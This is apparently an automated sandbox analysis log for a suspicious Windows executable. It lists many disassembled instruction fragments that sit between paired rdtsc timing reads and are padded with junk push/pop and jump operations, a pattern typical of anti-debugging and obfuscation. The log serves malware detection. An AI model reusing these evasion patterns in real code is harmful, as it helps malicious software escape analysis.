Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D061A2 second address: D061DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F43E8C1FDE3h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 jc 00007F43E8C1FDD6h 0x0000001e pop ebx 0x0000001f jnc 00007F43E8C1FDDCh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D061DB second address: D061E5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F43E91C545Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D065D4 second address: D065DE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43E8C1FDD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D065DE second address: D065E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D065E4 second address: D065F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D06FFF second address: D07007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D076DA second address: D076DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D055D3 second address: D055D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D055D7 second address: D055DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D055DD second address: D055F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F43E91C545Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D0DCC0 second address: D0DCC8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D0DE72 second address: D0DE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D0DE76 second address: D0DE87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jns 00007F43E8C1FDD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D0DE87 second address: D0DE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D1CED6 second address: D1CF25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007F43E8C1FDE8h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jp 00007F43E8C1FDD6h 0x0000001b jmp 00007F43E8C1FDE4h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D1CF25 second address: D1CF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F43E91C545Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C512E3 second address: C512E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D1CA82 second address: D1CAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C5469h 0x00000009 jmp 00007F43E91C5468h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D1CAB8 second address: D1CAD6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F43E8C1FDE6h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D1CAD6 second address: D1CADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D21972 second address: D21977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D21977 second address: D2197D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D212DD second address: D21309 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F43E8C1FDE0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D21309 second address: D2131B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43E91C5458h 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F43E91C5456h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D2618B second address: D261A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F43E8C1FDDAh 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D261A0 second address: D261C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C5469h 0x00000009 jbe 00007F43E91C5456h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D2F11F second address: D2F12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D308D6 second address: D3090B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jng 00007F43E91C5456h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F43E91C5468h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D3090B second address: D30912 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D389AF second address: D389CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C5467h 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D377CD second address: D377E6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F43E8C1FDDEh 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007F43E8C1FDD6h 0x00000010 pushad 0x00000011 jp 00007F43E8C1FDD6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D377E6 second address: D377FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F43E91C5468h 0x0000000f pushad 0x00000010 je 00007F43E91C5456h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D37944 second address: D37950 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D37950 second address: D3795F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C545Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D37AD8 second address: D37AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F43E8C1FDD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D3C1FF second address: D3C208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D3C208 second address: D3C213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F43E8C1FDD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D3C360 second address: D3C36E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D3C36E second address: D3C374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D3C374 second address: D3C37F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D3C37F second address: D3C38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D80F88 second address: D80F8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D80F8F second address: D80F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D80F9F second address: D80FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E50EB4 second address: E50EDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE4h 0x00000009 jmp 00007F43E8C1FDE3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E50EDF second address: E50EF9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F43E91C5456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F43E91C5464h 0x00000012 jp 00007F43E91C545Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E558CD second address: E558F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE1h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F43E8C1FDDBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E558F0 second address: E5590C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F43E91C545Fh 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E5590C second address: E55912 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E5476D second address: E54771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54771 second address: E54788 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54788 second address: E5478E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E5478E second address: E54798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F43E8C1FDD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54798 second address: E547C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43E91C5465h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jg 00007F43E91C5456h 0x00000012 jp 00007F43E91C5456h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E5492A second address: E5492E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E5492E second address: E54946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F43E91C5456h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jnp 00007F43E91C5456h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54AAA second address: E54AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54AB0 second address: E54AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F43E91C5462h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54C3A second address: E54C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54C40 second address: E54C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54C44 second address: E54C4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54C4B second address: E54C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54D84 second address: E54D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54D8A second address: E54DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jnp 00007F43E91C5456h 0x0000000c jmp 00007F43E91C5466h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E55321 second address: E55327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E599CF second address: E599D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E599D3 second address: E599DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E599DD second address: E599E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E599E1 second address: E599E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716000D second address: 7160030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 mov dx, 7CB6h 0x0000000a pop edx 0x0000000b popad 0x0000000c mov dword ptr [esp], ebp 0x0000000f jmp 00007F43E91C545Ah 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push edx 0x0000001a pop esi 0x0000001b mov ecx, ebx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160030 second address: 7160036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160036 second address: 716003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716003A second address: 7160059 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000030h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov bx, ax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160059 second address: 7160084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5465h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43E91C545Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160084 second address: 716012B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, B461h 0x00000011 mov dx, si 0x00000014 popad 0x00000015 mov dword ptr [esp], ebx 0x00000018 jmp 00007F43E8C1FDE8h 0x0000001d mov ebx, dword ptr [eax+10h] 0x00000020 jmp 00007F43E8C1FDE0h 0x00000025 xchg eax, esi 0x00000026 jmp 00007F43E8C1FDE0h 0x0000002b push eax 0x0000002c jmp 00007F43E8C1FDDBh 0x00000031 xchg eax, esi 0x00000032 pushad 0x00000033 mov dx, cx 0x00000036 mov bx, ax 0x00000039 popad 0x0000003a mov esi, dword ptr [775606ECh] 0x00000040 jmp 00007F43E8C1FDDAh 0x00000045 test esi, esi 0x00000047 pushad 0x00000048 pushad 0x00000049 mov si, 5983h 0x0000004d popad 0x0000004e push ebx 0x0000004f call 00007F43E8C1FDE2h 0x00000054 pop eax 0x00000055 pop edi 0x00000056 popad 0x00000057 jne 00007F43E8C20B4Fh 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 movsx edx, si 0x00000063 mov ebx, eax 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716012B second address: 7160179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5461h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov si, C143h 0x0000000f jmp 00007F43E91C5468h 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 mov cl, 1Dh 0x00000019 popad 0x0000001a xchg eax, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F43E91C5462h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160179 second address: 71601EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43E8C1FDE1h 0x00000009 add cl, FFFFFFD6h 0x0000000c jmp 00007F43E8C1FDE1h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F43E8C1FDE0h 0x00000018 xor ax, D9F8h 0x0000001d jmp 00007F43E8C1FDDBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 call dword ptr [77530B60h] 0x0000002c mov eax, 756AE5E0h 0x00000031 ret 0x00000032 pushad 0x00000033 movzx esi, dx 0x00000036 jmp 00007F43E8C1FDE1h 0x0000003b popad 0x0000003c push 00000044h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71601EC second address: 71601F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71601F0 second address: 7160203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160203 second address: 7160209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160209 second address: 716020D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716020D second address: 7160234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jmp 00007F43E91C5467h 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160234 second address: 716023A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716023A second address: 7160277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, cl 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F43E91C5468h 0x00000015 or ecx, 19B49AA8h 0x0000001b jmp 00007F43E91C545Bh 0x00000020 popfd 0x00000021 push ecx 0x00000022 pop edi 0x00000023 popad 0x00000024 rdtsc
